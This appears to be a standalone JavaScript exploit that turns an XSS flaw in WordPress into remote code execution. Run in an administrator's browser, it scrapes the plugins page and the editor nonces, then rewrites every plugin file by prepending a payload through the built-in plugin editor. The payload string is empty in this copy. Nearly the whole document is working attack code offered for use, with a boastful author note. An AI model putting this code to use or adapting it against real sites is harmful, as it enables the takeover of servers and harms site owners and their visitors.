/*
Author: @Evex_1337
Title: Wordpress XSS to RCE
Description: This Exploit Uses XSS Vulnerabilities in Wordpress Plugins/Themes/Core To End Up Executing Code After The Being Triggered With Administrator Previliged User. ?\_(ツ)_/?
Enjoy.
*/



//Installed Plugins Page
plugins = (window.location['href'].indexOf('/wp-admin/') != - 1) ? 'plugins.php' : 'wp-admin/plugins.php';
//Inject "XSS" Div
jQuery('body').append('');
xss_div = jQuery('#xss');
xss_div.hide();
//Get Installed Plugins Page Source and Append it to "XSS" Div
jQuery.ajax({
url: plugins,
type: 'GET',
async: false,
cache: false,
timeout: 30000,
success: function (txt) {
xss_div.html(txt);
}
});
//Put All Plugins Edit URL in Array
plugins_edit = [];
xss_div.find('a').each(function () {
if (jQuery(this).attr('href').indexOf('?file=') != - 1) {
plugins_edit.push(jQuery(this).attr('href'));
}
});
//Inject Payload
for(var i = 0; i < plugins_edit.length; i++){
jQuery.ajax({
url: plugins_edit[i],
type: 'GET',
async: false,
cache: false,
timeout: 30000,
success: function (txt) {
xss_div.html(txt);
_wpnonce = jQuery('form#template').context.body.innerHTML.match('name="_wpnonce" value="(.*?)"')[1];
old_code = jQuery('form#template div textarea#newcontent')[0].value;
payload = '';
new_code = payload + "\n" + old_code;
file = plugins_edit[i].split("file=")[1];

jQuery.ajax({
url: plugins_edit[i],
type: 'POST',
data: {"_wpnonce":_wpnonce,"newcontent":new_code,"action":"update","file":file,"submit":"Update File"},
async: false,
cache: false,
timeout: 30000,
success: function (txt) {
xss_div.html(txt);
if(jQuery('form#template div textarea#newcontent')[0].value.indexOf(payload) != -1){
// Passed, this is up to you ( skiddies Filter :D )
injected_file = window.location.href.split('wp-admin')[0] + "/wp-content/plugins/"+file; //http://localhost/wp//wp-content/plugins/504-redirects/redirects.php

throw new Error("");
}

}
});

}
});

}